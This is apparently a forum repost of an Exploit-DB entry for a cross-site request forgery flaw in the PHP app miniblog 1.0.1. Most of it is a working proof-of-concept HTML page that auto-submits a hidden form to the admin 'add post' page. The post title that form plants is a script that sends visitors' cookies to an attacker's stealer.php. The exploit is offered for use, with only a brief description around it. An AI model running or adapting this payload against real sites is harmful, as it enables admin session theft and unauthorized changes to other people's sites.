- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 40480
- Проверка EDB
-
- Пройдено
- Автор
- BESIM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2016-10-09
miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
Код:
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author : Besim
# Google Dork :
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.spyka.net/scripts/php/miniblog
# Software link :
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip
Description (admin login required) :
miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
edit article in the sections
Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add
Dangerous point : if used with XSS can be steal on the admin's cookie information.
*############### CSRF PoC ###############*
<html> <!-- CSRF PoC --> <body> <form action="
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
method="POST"> <input type="hidden" name="data[post_title]"
value="<script>location.href = ‘http://www.attackersite.com/stealer.php?cookie=’+document.cookie;</script>"
/> <input type="hidden" name="data[post_content]"
value="tester" /> <input type="hidden" name="data[published]"
value="1" /> <input type="hidden" name="miniblog_PostBack" value="Add"
/> <input type="submit" value="Submit request" /> </form> <script>
document.forms[0].submit(); </script> </body> </html>
########################################- Источник
- www.exploit-db.com
